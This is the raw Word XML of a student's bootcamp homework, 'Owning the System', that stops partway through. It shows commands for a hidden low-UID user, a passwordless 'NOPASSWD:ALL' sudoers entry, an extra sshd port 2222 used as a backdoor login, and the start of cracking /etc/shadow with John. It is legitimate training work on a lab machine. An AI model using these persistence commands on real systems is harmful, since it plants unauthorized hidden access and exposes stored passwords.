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ahnpx8mvr3" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Week 6 Homework Submission File: Advanced Bash - Owning the System</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Please edit this file by adding the solution commands on the line below the prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Save and submit the completed file for your homework submission.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Step 1: Shadow People</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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Create a secret user named sysd. Make sure this user doesn't have a home folder created:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="0000ff"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">adduser --no-create-home --uid 800 sysd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5905500" cy="4371975"/>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055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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Give your secret user a password:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="0000ff"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The command used in step 1.1 above to create user account ‘sysd’ helped set the password for that account</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1404938"/>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720" w:firstLine="0"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="0000ff"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: One can use passwd command to change the password for user ‘sysd’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="0000ff"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">passwd  sysd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="0000ff"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(As we are in root prompt , there is no need for using sudo) </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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Give your secret user a system UID &lt; 1000:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="0000ff"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The command used in step 1.1 above to create user account ‘sysd’ with an UID 800. So, no further action is needed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="0000ff"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="0000ff"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5133975" cy="1400175"/>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339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ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="0000ff"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: One can use usermod command to modify/change the user id(UID) of user ‘sysd’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="0000ff"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">usermod -u &lt;userid&gt; &lt;username&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="0000ff"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(As we are in root prompt , there is no need for using sudo) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="0000ff"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Give your secret user the same GID:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="0000ff"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The command used in step 1.1 above to create user account ‘sysd’ with an UID 800 automatically helped create that account with GID 800. So, no further action is required.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="0000ff"/>
        </w:rPr>
      </w:pP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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5133975" cy="140017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339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720" w:firstLine="0"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="0000ff"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: One can use command to modify/change the group id (GID)of group ‘sysd’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="0000ff"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">groupmod -g &lt;groupid&gt; &lt;group name&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="0000ff"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(As we are in root prompt , there is no need for using sudo) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="0000ff"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Give your secret user full sudo access without the need for a password:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="0000ff"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I ran visudo command as root to edit /etc/sudoers file and added the following line.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sysd ALL=(ALL:ALL) NOPASSWD:ALL</w:t>
      </w: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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5257800" cy="14001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578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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Test that sudo access works without your password:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From root account, I switched to sysd account by running the following command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="0000ff"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">su sysd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="0000ff"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After switching to the sysd account, I am able to run sudo -l and it ran WITHOUT prompting me to enter a password.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2595563"/>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59556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Step 2: Smooth Sailing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Edit the sshd_config file:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With root privileges, I edited the sshd_config file and uncommented the line that contains Port 22 and added another line with Port 2222. This will ensure that sshd service is started on port 2222 in addition to listening on port 22.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="251460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Step 3: Testing Your Configuration Update</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Restart the SSH service:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">systemctl restart sshd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="24765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Exit the root account:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH to the target machine using your sysd account and port 2222:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="0000ff"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh sysd@192.168.6.105 -p 2222</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="6553200"/>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3"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use sudo to switch to the root user:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="0000ff"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo su</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="0000ff"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="248920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left="1440" w:firstLine="0"/>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Step 4: Crack All the Passwords</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH back to the system using your sysd account and port 2222:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh sysd@192.168.6.105 -p 2222</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="65532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ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Escalate your privileges to the root user. Use John to crack the entire /etc/shadow file:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="0000ff"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo su</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
